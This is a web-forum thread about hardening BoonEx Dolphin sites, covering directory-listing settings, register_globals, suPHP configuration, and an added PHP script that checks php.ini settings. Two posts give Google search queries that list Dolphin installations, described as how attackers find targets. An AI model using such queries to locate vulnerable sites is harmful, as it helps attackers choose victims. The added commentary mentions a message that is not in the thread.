>> 5th hackers may be pulling url addresses for dolphin owners from unity


Naaaa … hackers wouldn't waste the time when they have a laser-targeted list with a simple search engine search:

"BoonEx - Community Software; Dating And Social Networking Scripts; Video Chat And More"


Results 1 - 10 of about 179,000 for "BoonEx - Community Software; Dating And Social Networking Scripts; Video Chat And More". (0.46 seconds)

http://www.google.com/search?complete=1&hl=en&q=%22BoonEx+-+Community+Software%3B+Dating+And+Social+Networking+Scripts%3B+Video+Chat+And+More%22&btnG=Google+Search&aq=f

16 Jul 2008

Hi,

Ken707 - If you want to stop someone from seeing what's in a folder when they navigate to it directly you can insert an index.html file that's a simple redirect to your home page. Or do one that warns them. I sometimes use this - it also displays their IP address. Don't know how effective it is but it stops them viewing your files...

<!-- Save this as index.php rather than index.html: the server only runs the
     PHP block below in a .php file; in an .html file it is sent out as text. -->
<div style="text-align: center;"><br>
<br>
<span style="font-family: Arial Black;"><span style="font-weight: bold;"><br>
This area is restricted.<br>
Your IP address has been logged and your unauthorised <br>
access attempt will be reported.<br>
IP :
<?php
// REMOTE_ADDR is set by the web server, but escape it anyway before echoing
// it into HTML so nothing from the request can be reflected as markup.
echo htmlspecialchars($_SERVER['REMOTE_ADDR'], ENT_QUOTES, 'UTF-8');
?>
<br>
<br>
</span></span></div>

Just create a text file, copy it in then save it as index.html and upload it into your folders.

I think there's probably a more efficient way to do it using htaccess or something but I'm not a programmer (I'm a template tweaker) so I'm not sure how to write that.

Cheers

Max

16 Jul 2008

What you are referring to is adding the following line

Options -indexes

to the root .htaccess file, which prevents directory browsing even if you don't have an index file in directories.


i.e. no one can see your files …


It will return: 

Forbidden

You don't have permission to access /whatever/ on this server.


Thanks for sharing …

17 Jul 2008

Hi,

So I just insert the line -

Options -indexes

To anywhere inside my root htaccess?


Its that simple?

Cheers

Max

18 Jul 2008

Yes, your root .htaccess file (for dolphin) should already have the line

Options -MultiViews

at the top. Just put it on the next line.  This makes ALL directories under the root NOT show files.

Test by going to a directory that does NOT have an index file or simply make a new directory to test with.

By contrast, if you want to enable directory listings for certain directories on your server, just create a .htaccess file in those directories and place in it the line:

Options +indexes

19 Jul 2008

Hi all,

 

this may or may not help some.

 

firstly I think Dolphin is great - but the first time I used it I installed without checking over the issues etc so I got hacked and my account was suspended. This time I read up and may have got it better :)

 

The biggest difficulty I found was with getting register_globals to off. I finally got my hosting company to turn the globals off at their end and they put me on a php.ini file. When I ran my own info.php file on my php server set up it said my globals were turned off - so I thought it was dealt with. However when I checked the php set up with the admin/phpinfo.php method included with dolphin it said register_globals was still on.

 

So I tried loads of ways to get it to register off - changing php.ini and adapting .htaccess code. I finally got it sorted by using this code in the main .htaccess file in the root directory:

 

suPHP_ConfigPath /home/YourcPanelName/public_html

 

If you are using a cPanel environment with suPHP installed this is the way to get your php.ini file recognised sitewide. If you think you have your globals switched off but still get hacked always check using the dolphin admin/phpinfo.php method to make sure - don't just rely on an info.php script in your root folder.

 

Having said this I've probably opened myself up to attack now

 

all the best

Kevin
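Kevin's point that a root-level info.php can report one thing while the application directory gets another is worth turning into a check. As an added example (not Dolphin's admin/phpinfo.php), the script below reports the settings that matter for the include attacks in this thread, says which php.ini actually produced them, and flags the suPHP case from the HostGator message where php_flag lines in .htaccess are silently ignored. The file name check_ini.php is hypothetical; put it in the same directory as the application, request it once, then delete it.

```php
<?php
// Added example, not part of Dolphin. Place next to the application files,
// request it once over the web (so it runs under the same SAPI and php.ini
// as the site), read the output, then delete the file.

function iniBool($sName)
{
    // ini_get() hands back "1", "0", "On", "Off" or "" depending on how the
    // value was written in php.ini or .htaccess; normalise to a real boolean.
    return filter_var(ini_get($sName), FILTER_VALIDATE_BOOLEAN);
}

function hardeningReport()
{
    $aReport = array(
        'sapi'              => php_sapi_name(),        // apache2handler = mod_php, cgi-fcgi = suPHP/FastCGI
        'loaded_php_ini'    => php_ini_loaded_file(),  // the php.ini in effect for THIS directory
        'register_globals'  => iniBool('register_globals'),
        'allow_url_fopen'   => iniBool('allow_url_fopen'),
        'allow_url_include' => iniBool('allow_url_include'),
        'display_errors'    => iniBool('display_errors'),
    );

    $aProblems = array();
    if ($aReport['register_globals']) {
        $aProblems[] = 'register_globals is On: request parameters become PHP variables';
    }
    if ($aReport['allow_url_include']) {
        $aProblems[] = 'allow_url_include is On: include() will fetch remote files';
    }
    if ($aReport['display_errors']) {
        $aProblems[] = 'display_errors is On: error messages leak file paths to visitors';
    }
    // php_flag / php_value in .htaccess are only read by mod_php. Under suPHP
    // or any CGI/FastCGI setup they are ignored and the php.ini that applies
    // is the one the handler finds (e.g. via suPHP_ConfigPath), which is why
    // a root info.php and the application directory can disagree.
    if ($aReport['sapi'] !== 'apache2handler' && $aReport['sapi'] !== 'apache') {
        $aProblems[] = 'PHP runs as ' . $aReport['sapi']
            . ': php_flag lines in .htaccess are ignored here, set the values in php.ini';
    }
    $aReport['problems'] = $aProblems;
    return $aReport;
}

header('Content-Type: text/plain');
foreach (hardeningReport() as $sKey => $mValue) {
    echo str_pad($sKey, 18),
         is_array($mValue) ? implode("\n" . str_repeat(' ', 18), $mValue) : var_export($mValue, true),
         "\n";
}
```

The useful line is loaded_php_ini: if it differs between the site root and a subdirectory, or reads false, the php.ini you edited is not the one that directory is using, and a suPHP_ConfigPath entry (or the host's own per-directory php.ini mechanism) is what fixes it rather than more php_flag lines.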

18 Mar 2009

Hi, my site just got hacked. I restored it and 5 hours later it was hacked again.

Could I please get some recommendations of a freelancer that could Audit and harden my server and Dolphin set up?

Need this ASAP

J

15 Aug 2009

Many Hackers find your site with the help of google, and sometimes yahoo. If you don't want to be a target, get all the default language changed to something custom.

Pay for a license to remove the "Powered by Dolphin" mention in the footer.

http://www.google.com/search?hl=en&safe=off&num=100&q=%22powered+by+dolphin+smart+community+builder%22&aq=f&oq=&aqi=

Do not use the default "quotes" that come with the quotes mod.

Don't use any default signup lingo, or anything that is default.

It can all be found in a google search. Once a hacker finds your dolphin site, it's just a matter of testing it for vulnerabilities after that. Once they see that you have an open door, then you will be hacked. But trust me, it starts with a search.

And oh yeah, never post your link here. Hackers lurk around here for their next victim as well.
